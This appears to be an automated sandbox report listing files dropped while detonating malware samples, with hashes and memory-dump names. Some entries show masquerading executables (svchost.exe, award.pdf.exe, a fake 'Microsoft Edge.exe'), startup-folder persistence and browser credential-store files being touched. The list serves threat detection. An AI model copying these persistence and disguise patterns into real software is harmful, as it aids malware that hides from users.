SHA512 9dd89ff3837b87a8cf269108c8e67fb57f2a46921f1d9c9a263b9651b5f7ea97f4fe76bd3bb0bb85695ea6a0c08fd4b243be2243eb03add02491d8c06d7dbda8

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

MD5 6f154cc5f643cc4228adf17d1ff32d42
SHA1 10efef62da024189beb4cd451d3429439729675b
SHA256 bf901de5b54a593b3d90a2bcfdf0a963ba52381f542bf33299bdfcc3b5b2afff
SHA512 050fc8a9a852d87f22296be8fe4067d6fabefc2dec408da3684a0deb31983617e8ba42494d3dbe75207d0810dec7ae1238b17b23ed71668cc099a31e1f6539d1

memory/6324-1151-0x00000000002F0000-0x0000000000614000-memory.dmp

memory/1968-1158-0x0000000000400000-0x0000000002AA2000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe

MD5 bdb4ee3cf82788678666604f0941d1c3
SHA1 62f1dd4c66015ffa1bf91f278713ed9ee3cf5d2e
SHA256 88a94358abb1292e3f9abc1b39cd93a5509e173de3cd727dd68867bce608c144
SHA512 442008188f7852568681b1655590e9dfb76a54c49543ebf01dc8724fa20ab8019050ef1284d645270abaa2ed1f30786dfdd41a889828209a94562ed892fac626

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

MD5 bfb045ceef93ef6ab1cef922a95a630e
SHA1 4a89fc0aa79757f4986b83f15b8780285db86fb6
SHA256 1f6b69d11a3066e21c40002a25986c44e24a66f023a40e5f49eecaea33f5576d
SHA512 9c1bfa88b5b5533ede94158fa3169b9e0458f1ceae04dae0e74f4c23a899ce27d9109bd298a2053fb698e2ed403f51a9b828ee9fa9d66b54a18cd0d969edc194

C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe

MD5 7f79f7e5137990841e8bb53ecf46f714
SHA1 89b2990d4b3c7b1b06394ec116cd59b6585a8c77
SHA256 94f0113ae76742bb2941e823382a89b7f36e6e0de37a63cf39a76c6d1ffbe2da
SHA512 92e1c29c9a375e95cb4307ab9b6b2eaac8b7aea9be9523bdd905baedf8e8ee77bad886076a9b5065fd1ace21e5087358a2fa4d3d2506346139dfb0e580e6df0a

memory/6988-1387-0x0000000000400000-0x0000000000422000-memory.dmp

memory/6544-1388-0x000000001C860000-0x000000001C8B0000-memory.dmp

memory/6544-1389-0x000000001C970000-0x000000001CA22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 321a0ea0b8e867e9f6b0e28b1efcbd2e
SHA1 1e4860aa6dc8b6d986132ecb453d40582b92b0eb
SHA256 5b43c3fa55fb0dec9fa3d5ef70f9b7468c9745188c3841c009b70e65428ae363
SHA512 b6bb056ba762ca4f88545d8ab2d9e41b2c3a356bfed3809dfcd0c1ff7fd5a95dfce011f54ca60b4b5c6b9cf2afbcfcba0ff89d05cf69f1f3c7ba4622c83bc1c8

C:\Users\Admin\Downloads\UrlHausFiles\boot.exe

MD5 821faf50d57297a90ca78955054204ef
SHA1 19e46dcf3c0424b8b1e33b863297acc7e908b8b5
SHA256 5a137be3c113e77d9f0f49905cb6e25ea8d936bf2fe5eb76183d38e2140ce05a
SHA512 505140a95b8ea026d41ce48dccb9b327a0628b7f00dda9ef41caf9f6f7c849a4a5c230e8804df70b176ead3ad1a5894c0521cc4f195a3769541b4e13ebc341da

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7790e968fd9809918a1f97dd3b5b75ac
SHA1 f127c5e2e0278b764be838707c8f279a8796d2c8
SHA256 505aedf341ac36fe7f01323a8c1f83b051b8b65f0059086234cceeb976ce17d4
SHA512 e0a82c0372d04c830eb572ec1c9808e80fad89f68512d527b41a14a5a6c21617dc069893a14aaddc56312add9c674c1c221044bee581807faaffc09b0b686461

memory/1076-1459-0x0000000000400000-0x0000000000833000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe

MD5 7f44b7e2fdf3d5b7ace267e04a1013ff
SHA1 5f9410958df31fb32db0a8b5c9fa20d73510ce33
SHA256 64ffa88cf0b0129f4ececeb716e5577f65f1572b2cb6a3f4a0f1edc8cf0c3d4f
SHA512 d2f0673a892535c4b397000f60f581effa938fdd4b606cf1bebcef3268416d41a1f235100b07dcae4827f1624e1e79187c2513ca88a5f4a90776af8dbaad89ae

C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe

MD5 aaf1146ec9c633c4c3fbe8091f1596d8
SHA1 a5059f5a353d7fa5014c0584c7ec18b808c2a02c
SHA256 cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272
SHA512 164261748e32598a387da62b5966e9fa4463e8e6073226e0d57dd9026501cd821e62649062253d8d29e4b9195c495ecaeab4b9f88bd3f34d3c79ed9623658b7c

memory/6552-1484-0x000001826B000000-0x000001826B104000-memory.dmp

memory/6552-1486-0x000001826B4A0000-0x000001826B4B0000-memory.dmp

memory/6552-1485-0x000001826B510000-0x000001826B54C000-memory.dmp

memory/6552-1491-0x000001826D5F0000-0x000001826D622000-memory.dmp

memory/6552-1490-0x000001826CE30000-0x000001826CE60000-memory.dmp

memory/6552-1492-0x000001826D630000-0x000001826D6E0000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe

MD5 9f3e5e1f0b945ae0abd47bbfe9e786c0
SHA1 41d728d13a852f04b1ebe22f3259f0c762dc8eed
SHA256 269c4228bd5c9ecf58e59ad19cb65f1cb3edd1c52c01ccc10a2f240d4cc4e4e1
SHA512 f7017b3361628cbd25aac02099e75e328eeaa4793d6d4682220c8123bd66e8a58bb02e4cdf105035b8e7a06e6f50bf77c80c3ad10e021433dac7280bff8922bd

memory/6876-1521-0x0000000000400000-0x00000000008C5000-memory.dmp

memory/3348-1534-0x00007FF605270000-0x00007FF6054AC000-memory.dmp

memory/3348-1537-0x00007FF605270000-0x00007FF6054AC000-memory.dmp

memory/6988-1540-0x0000000000400000-0x0000000000422000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\test28.exe

MD5 1fa166752d9ff19c4b6d766dee5cce89
SHA1 80884d738936b141fa173a2ed2e1802e8dfcd481
SHA256 8978e8d5c2cdf2620aa5541469ac7f395c566d7349f709c1d23dda48a0eda0d0
SHA512 5a2e8376a1408d44d025c02b27f5e6f24c14671f72677d918bf88e37e5800674cf576dd7bda8ecf08ea50d1cbeadb555abe8796421667408f3f2c5b42475ba7b

memory/6608-1552-0x0000000000180000-0x00000000001D4000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

MD5 fb900659d36610b68b34328064a9f5c8
SHA1 18d678488a119939b5466179be52dc9627bf240a
SHA256 c208e6f9ba39de74c5e47c9ab78c5c9d5af0fa55d1ed96f2bc6092ed91f1df07
SHA512 a8ba185466b5e155d2f70ad6179c2e686241fe87ba2660ffbf7d5237740e890e4f7375db0dc6fc732cc38a878a7a1e59b1a9e5f7938c87a32fa1b7c81ebdb6e3

memory/6904-1569-0x0000000000110000-0x0000000000D99000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe

MD5 90d46387c86a7983ff0ef204c335060a
SHA1 2176e87fa4a005dd94cca750a344625e0c0fdfb0
SHA256 e463e04623e7348c515e0cc29320ff4e282c360a93b7a51f696639bd96a8bfb8
SHA512 654768e8a185ae338f255ecc3e512f6b89a984c44807c9153b17c4e4a7cc6b796536c563b1823ed84fbc20414f7a5ead7e9296d1f6cd03aa52b293075e9fcb7b

memory/1076-1601-0x0000000000400000-0x0000000000833000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 2f9118783a1d82fe6d694b33010379d9
SHA1 255e6fc4d06c15d3157b69f41810b21e4fd2edde
SHA256 ba1cd91a9a65e9fd9171fb9ec9a52665c2e4df8470b764b76dab72b6cd902858
SHA512 2b8db5550c91d6c850760fae740795837cc5155d9555e132f422e953ef14d137f02d00dfc55968b39ad266d09e4f92b7b1eb73eead8b64d98acd0e12747e1ccb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe58a0a0.TMP

MD5 573d1d5b8da2e0f33b4dc5df721fe796
SHA1 b8a0138a5005bdc0ea20f523aa75ff6cba8e0edd
SHA256 7896e29ab12f92bbbd60136212103c816b59c2c37f22c2c244f00af869c00521
SHA512 deffb76175ccf16ce94da6549410dd5de6f592e9dd42c1515d74708512aa7d48a236274eb8b833c95c07dbef7250800829bfd88a9adcb15f4135e0f3b313c924

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 9dd3953c738943c7a46e01fdf82787e8
SHA1 685d4c74454ba651f60b3e02740a379bec378e28
SHA256 113a8f6e47d7b26c7c6eaab1e3a7e3d6f3dc25370abe82f93ce91264f0a40e61
SHA512 8c12320b3743ec295ecc5d6a548949df7439273c15cbe81dfac9b453e02d0f6bc79f5bafc9b7dee2e6e52dcc7b30717f4b5898b006d2a21df63429d0d908a4b7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58a227.TMP

MD5 e246ad2db44e8fc2ef6978808fc432a7
SHA1 b57b7d28bb65127e43e0fc9baa135856b9b13774
SHA256 35cebf97860f14c86e6c67c27c2ace2d063b75fd06f58396175f6be134cb2398
SHA512 af8364a1e885c74f9758b8328b5be8b7a8dece5d3e7c833072e536e0fb3a9b09585eb3b0ae29ef116d6b4c41805933003762c3d842a055bf0b011b1af3309556

C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe

MD5 c07e06e76de584bcddd59073a4161dbb
SHA1 08954ac6f6cf51fd5d9d034060a9ae25a8448971
SHA256 cf67a50598ee170e0d8596f4e22f79cf70e1283b013c3e33e36094e1905ba8d9
SHA512 e92c9fcd0448591738daedb19e8225ff05da588b48d1f15479ec8af62acd3ea52b5d4ba3e3b0675c2aa1705185f5523dcafdf14137c6e2984588069a2e05309f

C:\Users\Admin\Downloads\UrlHausFiles\msf.exe

MD5 e24e7b0b9fd29358212660383ca9d95e
SHA1 a09c6848e1c5f81def0a8efce13c77ea0430d1d5
SHA256 1c6ed59c11a8dc5d058c71cfccbcfbdbaff75c67a3dc1c5395044ff92b0ddfa1
SHA512 d5b34a3704311ecf99e92ba66206dea6f4c0b1f1412c588ee6c176a172a13e3230ff0b22f15860af9b1e39c7fb033dd5bf6ae5a33d090478d123645c4cc059f4

memory/400-1678-0x0000000004F70000-0x0000000004F71000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 8911e8d889f59b52df80729faac2c99c
SHA1 31b87d601a3c5c518d82abb8324a53fe8fe89ea1
SHA256 8d0c2f35092d606d015bd250b534b670857b0dba8004a4e7588482dd257c9342
SHA512 029fd7b8b8b03a174cdc1c52d12e4cf925161d6201bbe14888147a396cd0ba463fd586d49daf90ec00e88d75d290abfeb0bb7482816b8a746e9c5ce58e464bcf

memory/1496-1691-0x00007FF7F0A20000-0x00007FF7F0C57000-memory.dmp

memory/1496-1693-0x00007FF7F0A20000-0x00007FF7F0C57000-memory.dmp

memory/1496-1694-0x00007FF7F0A20000-0x00007FF7F0C57000-memory.dmp

memory/6904-1701-0x0000000000110000-0x0000000000D99000-memory.dmp

memory/5968-1704-0x0000000000DB0000-0x0000000000EDE000-memory.dmp

memory/6904-1705-0x0000000000110000-0x0000000000D99000-memory.dmp

C:\Users\Admin\AppData\Local\palladiums\translucently.exe

MD5 f4a43c4e63d1bc8908819fc2b3b6a83b
SHA1 03f88667ac44a41a2b5e4b2cf48f23302ae79b6c
SHA256 ecc61fe635e2cdb0859441ef90e330230094e7514cf00cb48829e136d713b63b
SHA512 6f1ce342403bc33f5dabfa0260da8f45bfd6d3bdfe72df20e0a617f71bf2abe926a29393d4a9e4621ee8a5ade029c20ed025fe377ab7c1d6f954f866c1efe76f

C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe

MD5 2912cd42249241d0e1ef69bfe6513f49
SHA1 6c73b9916778f1424359e81bb6949c8ba8d1ac9f
SHA256 968b7f6af70d85cf079621d8c4d54bb7385a584f2a3d3ef981610ae88cf939b0
SHA512 186ede7c630b7bcc3dacffd6ce92f10fc552305ff0a209572d8601d7b9a65845b9834a2e1e96a159450578705e0fc75c943f8e9af0fb31f9e21a5928030d3835

memory/5968-1723-0x0000000000DB0000-0x0000000000EDE000-memory.dmp

memory/5716-1724-0x0000000000290000-0x00000000003BE000-memory.dmp

memory/1076-1734-0x0000000000400000-0x0000000000833000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\def.exe

MD5 9f875cd80ee26b55a71c2f795eb01c33
SHA1 e71f7e13477c83c59c50cb975c3d893dae12d2ff
SHA256 a599f8e501bc4a1a7f1ed10b05b5b6fe4c6f13c40c1065af952740880123bfb9
SHA512 811ab159ef2868b6458f53784e639020eff3411f5063d76497d91a519ed78976e139d9deb726aef6acf2c6cc06838abf302875905dc9d4c1ef4f5e8802602394

memory/4368-1745-0x0000000000020000-0x0000000000470000-memory.dmp

memory/4368-1748-0x0000000000020000-0x0000000000470000-memory.dmp

memory/4368-1747-0x0000000000020000-0x0000000000470000-memory.dmp

memory/5716-1750-0x0000000000290000-0x00000000003BE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe

MD5 00a1a14bb48da6fb3d6e5b46349f1f09
SHA1 ebc052aa404ef9cfe767b98445e5b3207425afaa
SHA256 e3fdbb915d6a6737a13da5504ace5a279796247e3b24b3b049ee58013687fe35
SHA512 643f42aefd628143ec596c7ff4c6847b24a297e6996bf840d6de3f0364fca61bdb5ce322b709b2df748d189d233973a301d371d37f4e8291be8938205c49963b

memory/4748-1778-0x0000000000FB0000-0x0000000000FFE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe

MD5 74e635e56c4781293a765f5b0cfb4051
SHA1 a455c97eb81d60765dd7801d889c84f940276694
SHA256 2f668b580a0954c4256e96687d771efb278380f2177686aa78d3aafcc9f26c27
SHA512 1278f00a22758cbd74ec99d594210d7170fda8dde2faa1b8b8d000b0af6053e8240ec61e059c1255bc168fcfa90a83552ed7b184e576c88a7dfc576c81ad91fe

memory/6424-1797-0x0000000000C10000-0x0000000000CE0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bypass.exe

MD5 1efcfd4df313db8498547e0580b1a4a5
SHA1 bb5f6446bf7db6ba3fbd96851501f54450d638f5
SHA256 aba421350c6790a4ec7ef298082c6b7e148fd61f721ea2c2ee8e4bf0504202a6
SHA512 ce6c8edaf6635b8043d3a55c7e101e7ed0c923a1000b2525303d0be1961d80e7364e6b8898330094b9037afc4d21ccd972f994296fad38e58a73b9cc10c5617f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Process.exe

MD5 bc12151fecfb5bbedbae3d62586d4109
SHA1 88101de1ea5e5743c2dd72666a0d68dcf75c1cd6
SHA256 70d7a24104cb60b76aac7e9e0740b66d0f2279750bd2ddd6b5d984226def424d
SHA512 b7334a44c4b22b3fcf4a4e5f759101cf648266c2ef1eafd949e897d3ac569960557a8395a7dd68633fe4fc68430056031e1cab6c32f62a5692f04ca563d8ebdb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.exe

MD5 864fea4541f9e82764ad948599abd683
SHA1 42e5bd6a8b21cba48054d4fba17e01eda5073aac
SHA256 30de73b749f800363ac43060af1cde149ce927883246c40fad5541df8cc462cf
SHA512 ae7ea7c1ea2ec445366461cbad0b46ffe7ede86c1aa7334f8ab6e5cf3ab68c9615a8bfbd94cf491779a38a660e6de8fd17bfeca8c95f4a7d0288b9d9bf6ca8a7

C:\Users\Admin\Downloads\UrlHausFiles\key.exe

MD5 4cdc368d9d4685c5800293f68703c3d0
SHA1 14ef59b435d63ee5fdabfb1016663a364e3a54da
SHA256 12fb50931a167e6e00e3eb430f6a8406e80a7649f14b1265247b56416ac919b0
SHA512 c8f9d2ba84603384b084f562c731609f9b7006237f2c58b5db9efdfc456932b23e2582f98fb1eb87e28363dc8d9ae4c0a950c9482685bb22604c66a1e6d611de

C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe

MD5 4ca27b673fddb95ae6c063b5071f86f0
SHA1 c2f2ab39df11d6a15c5825a526480b253fbbc357
SHA256 1573bea93f2317dbf01fadfe7ff31d8c35a0cb7a6c0ebd6e21b24ecf8bd64b77
SHA512 8efcfaa5ccf5368c16cff5269b2013c2963c34f7c99aa7fc6609e82865cc88a8a55924736d45036836fa0e3e4a1b8997dbcd58d0eec44d86e337cc43cd9dee06

memory/336-1881-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4524-1916-0x0000000000400000-0x0000000000722000-memory.dmp

memory/4524-1917-0x0000000000400000-0x0000000000722000-memory.dmp

C:\ProgramData\BridgeGamer\BridgeGamer.exe

MD5 9cea57c3291b6830de246b453e7fb2f6
SHA1 e08de2aed424aa7339f0456a631095f3b116f8f4
SHA256 8bbda6436638e43c8f44582f2fe402b46ea795c3906bde5c31cfea252ce9a164
SHA512 004efacdec9fa5fa5a9425a630450fbd69fc029db9b135c2242d17e1e7ca9a6580ded1d01576725aeff04876f4682fa929228fde141af3025a87c49df674ae1c

C:\Users\Admin\Downloads\UrlHausFiles\7z.exe

MD5 76a0b06f3cc4a124682d24e129f5029b
SHA1 404e21ebbaa29cae6a259c0f7cb80b8d03c9e4c0
SHA256 3092f736f9f4fc0ecc00a4d27774f9e09b6f1d6eee8acc1b45667fe1808646a6
SHA512 536fdb61cbcd66323051becf02772f6f47b41a4959a73fa27bf88fe85d17f44694e1f2d51c432382132549d54bd70da6ffe33ad3d041b66771302cc26673aec7

memory/4368-1931-0x0000000000020000-0x0000000000470000-memory.dmp

memory/1076-1930-0x0000000000400000-0x0000000000833000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe

MD5 3042ed65ba02e9446143476575115f99
SHA1 283742fd4ada6d03dec9454fbe740569111eaaaa
SHA256 48f456ecc6360511504e7c3021d968ad647226115e9a5b2eb3aa5f21e539dca9
SHA512 c847a171dad32dfb4acee102300a770500a18af5e086b61c348305d1d81af7525d7d62ca5b88c7c298884ad408137c5d9c2efb1e8294b29084fd8b5dd6b4ee3c

memory/4368-1943-0x0000000000020000-0x0000000000470000-memory.dmp

memory/4180-1945-0x000000001BF70000-0x000000001C43E000-memory.dmp

memory/4180-1946-0x000000001C440000-0x000000001C4DC000-memory.dmp

memory/4180-1947-0x0000000001590000-0x0000000001598000-memory.dmp

memory/4180-1951-0x000000001C530000-0x000000001C540000-memory.dmp

memory/1004-1956-0x0000000000400000-0x000000000066D000-memory.dmp

C:\Program Files\Google\Chrome\Application\131.0.6778.86\Installer\setup.exe

MD5 288b7ac41c7aee8f1eb192faae30b665
SHA1 5c48a395de873d25313a7b1a6191a7a9fb0387fe
SHA256 e92a14f9bbe4da7405002b4803740d69e96d0a29a2944513d503b89f2faa46c9
SHA512 880e087fa5b3cc8b758de49580a6c8821b3dc7b52d9c1fbb077268a1042df85ae4043a73b14586c60f82e0af483646ea3f10b1b7f071535a5bdd6f73bb77353b

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

MD5 90aadf2247149996ae443e2c82af3730
SHA1 050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256 ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512 eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be

C:\Users\Admin\Downloads\UrlHausFiles\win.exe

MD5 fc3ec670ed332cdde2e7c3e2bc12d4e7
SHA1 ae7bc2e54d607f71d8dc96bfa5a9d95705fee85e
SHA256 565d8418a61394823d0b15ca93db41c44cc12928f1e6a7b153d945f5f13db476
SHA512 375a9d85ec284e471e2aa2dab4d9b25df7fe4619552d9218c9aeddbbef0ee649591554844c550ea2705e82e2f5f0de03ca4369a9544261ddef216ae14854bf4e

memory/4076-1999-0x0000000000260000-0x00000000007CB000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

MD5 d76e1525c8998795867a17ed33573552
SHA1 daf5b2ffebc86b85e54201100be10fa19f19bf04
SHA256 f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd
SHA512 c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd

C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd

MD5 e0fc8ae43180601da288c7c404d36a95
SHA1 17f3307ba13cb61fa1b8c906215c1462355fdadb
SHA256 c49da39d0da56555c773a2ffc184b2040be0d2de5594651b7d8ba169af9e82ef
SHA512 8d8feacdad6414bd10a33f8589f991615ba03506e016e0dc7085a8a5d9350e7e2b6ae12b164828f2d42996a1f7c70d713063971cb6edcfe6076e4c485dfa7e13

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe

MD5 99b098b23ced1a199145fe5577c9de91
SHA1 84031f7b3c97759d56b14591e1cf0ba1f552f201
SHA256 8979e74303550e257eb92225507bf2fb128cebde5f3f6e36b4236e822e194f64
SHA512 05cf74845b264ef2bf6faf8e8900e0f41baa04d43f989a33abbbb1cae9311789d50388510c836cf6dc5f314000572884a9823973a2c4950bfe0ba4699288fbfb

memory/3084-2024-0x0000000000400000-0x0000000000413000-memory.dmp

memory/4524-2025-0x0000000000400000-0x0000000000722000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr

MD5 fe67a15fee6b8e38448f2f4ce920018e
SHA1 a2a49be1b5350c4a98083e61dcf5e5c400ce344e
SHA256 3df51f436980557e6b2c3b18881cd6e973858500bf6bb04a9f4936227bd754ad
SHA512 9b00b16c24b6b9b27a6b23054ab35c501735cacbe4b85ad43d52ab91850bedf1354eda3a40f82e8a0821c9546801f8b060ecd6a8c90b27491fc9ec48d476d1f4

memory/1076-2035-0x0000000000400000-0x0000000000833000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\ONHQNHFT.msi

MD5 829e5e01899cac6e4326893afbf5be82
SHA1 da638840f3452d74b9118d6c60a5a6cf70b87901
SHA256 84abc28b1da1c2ddf01072fb2817eb446933ba98ecc0db2228281d6fcfadff0c
SHA512 212a35971a38f2800e876882a03e610c074b4918509d06d4a25e9cdebb1049e7a91bd7e659706914a9584f79943c94ca68f0f3be7acf84e056f3910c717c4f03

memory/4948-2049-0x0000000000400000-0x000000000053E000-memory.dmp

memory/2268-2052-0x0000000000400000-0x000000000053E000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\System.exe

MD5 3d2c42e4aca7233ac1becb634ad3fa0a
SHA1 d2d3b2c02e80106b9f7c48675b0beae39cf112b7
SHA256 eeea8f11bf728299c2033bc96d9a5bd07ea4f34e5a2fbaf55dc5741b9f098065
SHA512 76c3cf8c45e22676b256375a30a2defb39e74ad594a4ca4c960bad9d613fc2297d2e0e5cc6755cb8f958be6eadb0d7253d009056b75605480d7b81eb5db57957

C:\Users\Admin\AppData\Local\Temp\._cache_System.exe

MD5 8c423ccf05966479208f59100fe076f3
SHA1 d763bd5516cddc1337f4102a23c981ebbcd7a740
SHA256 75c884a8790e9531025726fd44e337edeaf486da3f714715fa7a8bdab8dbabe3
SHA512 0b94558cbfd426300673b4d98e98a9408de236fe93bb135fa07e77ee0851621bfc9a5129322f31c402a606ab1952eb103de483c3b48a86c3225318d98f78bc20

C:\ProgramData\Synaptics\Synaptics.exe

MD5 075045f176129f6b11d627db7c7a3c76
SHA1 d815d313d2882041b8adb063eda6a8bd62149443
SHA256 86586abd265e12fc63222aff947d6acb4f3d28b148f9c5abc5d548d74795f9c8
SHA512 86e9aff5e3cde31a9a553108f833003a9d905c1a1c1db72dca80cf0816ddabe63d18b8d7a616717c2f01f10148bc06915af0b9c4222305d5681d29d3b9d9198b

memory/3844-2194-0x0000000000B80000-0x0000000000B90000-memory.dmp

memory/5488-2265-0x0000000002330000-0x0000000002335000-memory.dmp

memory/5488-2390-0x0000000002330000-0x0000000002335000-memory.dmp

memory/5488-2389-0x0000000004040000-0x0000000004490000-memory.dmp

memory/5488-2388-0x0000000004040000-0x0000000004490000-memory.dmp

memory/4076-2361-0x0000000000260000-0x00000000007CB000-memory.dmp

memory/5488-2447-0x0000000002330000-0x000000000234F000-memory.dmp

memory/5488-2446-0x0000000002330000-0x000000000234F000-memory.dmp

memory/5488-2507-0x0000000004140000-0x0000000004573000-memory.dmp

memory/5488-2544-0x0000000004140000-0x0000000004DC9000-memory.dmp

memory/5488-2594-0x0000000002790000-0x00000000029C7000-memory.dmp

memory/5488-2634-0x0000000002790000-0x00000000029FD000-memory.dmp

memory/5488-2650-0x0000000002790000-0x00000000029FD000-memory.dmp

memory/5488-2677-0x0000000002790000-0x00000000029FD000-memory.dmp

memory/5488-2621-0x0000000002790000-0x000000000280D000-memory.dmp

memory/5488-2593-0x0000000002790000-0x000000000280D000-memory.dmp

memory/5488-2592-0x0000000004140000-0x0000000004DC9000-memory.dmp

memory/4972-2720-0x000001E3C8410000-0x000001E3C8454000-memory.dmp

memory/4972-2723-0x000001E3C84E0000-0x000001E3C8556000-memory.dmp

memory/5488-2729-0x0000000004040000-0x0000000004490000-memory.dmp

memory/5488-2728-0x0000000002330000-0x0000000002335000-memory.dmp

memory/5488-2744-0x0000000002330000-0x0000000002335000-memory.dmp

memory/5488-2743-0x0000000004040000-0x0000000004490000-memory.dmp

memory/1004-2751-0x0000000000400000-0x000000000066D000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 9cf77b2eafc2cd5d83f532a000bcc027
SHA1 775bffeee985b868654c5ddbf0c21a1f6f806f15
SHA256 4ebd059d8911b34eaf488d8b938d8eee6b3f27b4dad1ca527481348ba6ede012
SHA512 4a998c2ad20e20e333171ab32101617c9d96af12fa52e5285e254a53dd57a4e593c58f33dd3f709308bf36e9bcb2f56ea2cb86ec95178e3f95ff057daec41eb0

memory/7172-2761-0x0000000000A40000-0x0000000000A52000-memory.dmp

memory/5488-2786-0x0000000004140000-0x0000000004DC9000-memory.dmp

memory/5488-2785-0x0000000002330000-0x000000000234F000-memory.dmp

memory/5488-2784-0x0000000002330000-0x000000000234F000-memory.dmp

memory/5488-2800-0x0000000002790000-0x00000000029C7000-memory.dmp

memory/5488-2833-0x0000000004140000-0x0000000004573000-memory.dmp

memory/5488-2834-0x0000000004140000-0x0000000004573000-memory.dmp

memory/5488-2836-0x0000000002790000-0x000000000280D000-memory.dmp

memory/5488-2835-0x0000000004140000-0x0000000004DC9000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\a.exe

MD5 ff370f449a6e83018df4b4163380fc57
SHA1 012c030503055803fd192c60dcc9e4733f917025
SHA256 1aa867bb4fb60de654e5e166c0a0e45c3b131a0131484c6b8888fea501c37b3a
SHA512 b0b41d5b391f6cfd582830abe132b87dc9434768c78dca90b3b8aaffe40880f6bb07a120b60cd4832e72202ea7c8257f4ec20d0b152136f6fc1ceb0a2b23ad7e

C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\clip64.dll

MD5 6e634793e84d6039856e1c0f93eccc62
SHA1 0dc5154964c24d8db59e1e57a84e0fa015d07d6b
SHA256 1a6d5459303d5bbd7106ec8ba2710372b674e27002b1c896718b8c962c559bfa
SHA512 a94d738bd21276adf9f7bb530a72f5f9d76717d5e84d82aadb07e2991494cd6dbeef2c05a7ebad19a3c99b86a7066b18f15f984936199e115218c11e2d2b0dd3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 9e930267525529064c3cccf82f7f630d
SHA1 9cdf349a8e5e2759aeeb73063a414730c40a5341
SHA256 1cf7df0f74ee0baaaaa32e44c197edec1ae04c2191e86bf52373f2a5a559f1ac
SHA512 dbc7db60f6d140f08058ba07249cc1d55127896b14663f6a4593f88829867063952d1f0e0dd47533e7e8532aa45e3acc90c117b8dd9497e11212ac1daa703055

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 63b405b906305d863f2c69c6e04ba91d
SHA1 b3ab099771c3620733a41f7c6544badfc0d2f59b
SHA256 e454b2c5c601b8f87547f2020b1a4afc76674610debf8a8cbbd8ccf0ae06c32f
SHA512 536a576fd8aa39cf24d20e67ac4091939d9785edec8da0345d188fd9d0297a4c5c8034326ceece666977e3040e0192b9077aa3b53193a8ef5fda18088ac46b20

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 6ab42ef0454201b05d6a4d0d60df1fec
SHA1 b901590e0f8d5f6140f791c13fcbf9edc6eeaa3c
SHA256 d1c4c44bdb65f35232a7db3a2d5b4515a52dddaa4a61bc05e7f3cdd3e530ae6a
SHA512 772a37ab8dfb92885443a2671f63e22a19f3f909e5fe0228a2edcf48a4d375508098a5a0ad88f9f5964b4f541ea9983ff3eec1a7c32a4edd38001cf9a96928b7

C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe

MD5 6d81053e065e9bb93907f71e7758f4d4
SHA1 a1d802bb6104f2a3109a3823b94efcfd417623ec
SHA256 ac8e5e2c1d93079850024ac0ca311b68576b700817ef26509692ca1e10e6d52b
SHA512 8a1c59a03e6cbcedadc0d40e0dc58fc7ea03d3f0f70353b2fd1ea07e3a67526f3c01cb58364f55b0f7f56602c1f967d9fe33cbd3cf7326e7d5801d2e910c4183

